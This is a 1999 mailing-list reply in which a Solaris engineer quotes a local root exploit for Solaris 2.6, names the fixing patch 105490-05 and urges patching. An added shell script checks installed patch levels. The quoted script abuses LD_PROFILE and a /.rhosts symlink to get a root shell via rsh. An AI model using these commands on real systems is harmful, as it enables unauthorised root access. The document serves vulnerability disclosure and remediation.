Re: LD_PROFILE local root exploit for solaris 2.6

From: Darren Moffat - Solaris Sustaining Engineering (darren.moffatat_private)
Date: Fri Sep 24 1999 - 02:00:46 PDT


    >works on solaris 2.6 sparc anyway...
    >
    >#! /bin/ksh
    >#  LD_PROFILE local root exploit for solaris
    >#  steveat_private 19990922
    >umask 000
    >ln -s /.rhosts /var/tmp/ps.profile
    >export LD_PROFILE=/usr/bin/ps
    >/usr/bin/ps
    >echo + + >  /.rhosts
    >rsh -l root localhost csh -i
    
    
    This was bug# 4150646/1241843 which is fixed in patch 105490-05 (or higher),
    which was released over 1 year ago (Sep/10/98)!
    
    Patch 105490-07 is in the current recommended patch set for Solaris 2.6,
    so it is publicly available.
    
    I strongly recommend that people apply the latest recommended and security
    patch sets when testing out security exploits.  That way you won't send
    out information about exploits which have been long fixed and needlessly
    panic people.
    
    --
    Darren J Moffat
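
A host can be checked against the fix level named in the message (105490-05 or higher) by reading its installed-patch list. The script below is an added example, not part of the original message or of any Sun tooling; it assumes the usual `showrev -p` line layout, and the sample lines, the package name and patch 999999 are constructed placeholders.

```shell
#!/bin/sh
# Added example (not from the original message): check `showrev -p` output
# for patch 105490 at revision 05 or later, the fix level the message names.

PATCH_BASE=105490   # patch id from the message
MIN_REV=5           # "105490-05 (or higher)"

# Print the highest installed revision of patch $1 seen on stdin (nothing if absent).
# Only the "Patch:" field counts; an id listed under "Obsoletes:" is not installed.
highest_rev() {
    awk -v base="$1" '
        $1 == "Patch:" {
            n = split($2, id, "-")
            if (n == 2 && id[1] == base && id[2] ~ /^[0-9]+$/) {
                rev = id[2] + 0                 # "07" -> 7 (decimal)
                if (!seen || rev > max) { max = rev; seen = 1 }
            }
        }
        END { if (seen) printf "%d\n", max }'
}

# Read `showrev -p` output on stdin.
# Returns 0 = fix level present, 1 = patch present but older, 2 = patch not found.
check_ld_profile_fix() {
    rev=$(highest_rev "$PATCH_BASE")
    if [ -z "$rev" ]; then
        echo "patch $PATCH_BASE: not found, host needs review"
        return 2
    fi
    if [ "$rev" -ge "$MIN_REV" ]; then
        printf 'patch %s-%02d: at or above -%02d, fix present\n' "$PATCH_BASE" "$rev" "$MIN_REV"
        return 0
    fi
    printf 'patch %s-%02d: below -%02d, apply the recommended patch set\n' "$PATCH_BASE" "$rev" "$MIN_REV"
    return 1
}

# Constructed sample in `showrev -p` layout (package name and patch 999999 are placeholders).
SAMPLE='Patch: 105490-04 Obsoletes:  Requires:  Incompatibles:  Packages: SUNWexample
Patch: 105490-07 Obsoletes:  Requires:  Incompatibles:  Packages: SUNWexample
Patch: 999999-01 Obsoletes: 105490-09 Requires:  Incompatibles:  Packages: SUNWexample'

printf '%s\n' "$SAMPLE" | check_ld_profile_fix
# On a live host: showrev -p | check_ld_profile_fix
```

A result of 2 only means no `Patch: 105490-NN` line was found; a host whose list mentions the id solely under `Obsoletes:` still needs a manual look.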
    


